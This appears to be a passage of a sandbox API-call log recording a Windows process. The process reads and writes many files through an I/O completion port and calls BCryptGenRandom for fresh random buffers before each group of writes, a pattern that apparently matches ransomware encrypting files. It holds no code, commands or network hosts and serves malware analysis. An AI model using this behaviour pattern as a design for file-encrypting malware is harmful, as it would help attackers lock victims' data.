[0153.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.957] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x82a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.968] CloseHandle (hObject=0x338) returned 1 [0153.969] free (_Block=0x1ff1e60) [0153.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0153.982] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xcbe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.000] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.025] CloseHandle (hObject=0x3cc) returned 1 [0154.025] free (_Block=0x3d70450) [0154.025] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.034] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7940, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.047] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x6960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.063] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.067] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.067] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.068] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.110] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xf6a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0154.110] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.110] CloseHandle (hObject=0x2a8) returned 1 [0154.111] free (_Block=0x3e70008) [0154.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.121] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.121] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.121] free (_Block=0x3e305b8) [0154.122] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.122] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.122] free (_Block=0x1fa91d0) [0154.122] free (_Block=0x1fa2ed8) [0154.122] free (_Block=0x1fa90b8) [0154.122] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.123] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.124] CloseHandle (hObject=0x2a8) returned 1 [0154.125] free (_Block=0x1ff1e60) [0154.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.136] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11dee, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.152] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x94c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.153] CloseHandle (hObject=0x2a8) returned 1 [0154.153] free (_Block=0x3df0008) [0154.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.163] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.163] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.163] free (_Block=0x3e305b8) [0154.163] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.163] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.164] free (_Block=0x1fa91d0) [0154.164] free (_Block=0x1fa2ed8) [0154.164] free (_Block=0x1fa90b8) [0154.164] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.166] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.167] CloseHandle (hObject=0x2a8) returned 1 [0154.167] free (_Block=0x3df0008) [0154.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.192] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.192] free (_Block=0x3e305b8) [0154.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.192] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.192] free (_Block=0x1fa91d0) [0154.192] free (_Block=0x1fa2ed8) [0154.192] free (_Block=0x1fa90b8) [0154.192] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.194] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.206] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3854, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.207] CloseHandle (hObject=0x2a8) returned 1 [0154.208] free (_Block=0x3df0008) [0154.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.218] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.218] free (_Block=0x3e305b8) [0154.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.218] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.218] free (_Block=0x1fa91d0) [0154.218] free (_Block=0x1fa2ed8) [0154.218] free (_Block=0x1fa90b8) [0154.219] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.220] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.232] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x30f2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.249] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c9e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.251] CloseHandle (hObject=0x2a8) returned 1 [0154.251] free (_Block=0x3df0008) [0154.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.368] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.368] free (_Block=0x3e305b8) [0154.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.368] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.368] free (_Block=0x1fa91d0) [0154.368] free (_Block=0x1fa2ed8) [0154.368] free (_Block=0x1fa90b8) [0154.368] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.379] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.386] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3700, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0154.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.406] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.406] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.406] free (_Block=0x3e305b8) [0154.406] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.406] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.406] free (_Block=0x1fa91d0) [0154.406] free (_Block=0x1fa2ed8) [0154.406] free (_Block=0x1fa90b8) [0154.406] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.416] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.416] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.416] free (_Block=0x3e305b8) [0154.416] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.416] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.416] free (_Block=0x1fa91d0) [0154.416] free (_Block=0x1fa2ed8) [0154.416] free (_Block=0x1fa90b8) [0154.416] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.422] CloseHandle (hObject=0x338) returned 1 [0154.422] free (_Block=0x3d70450) [0154.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, 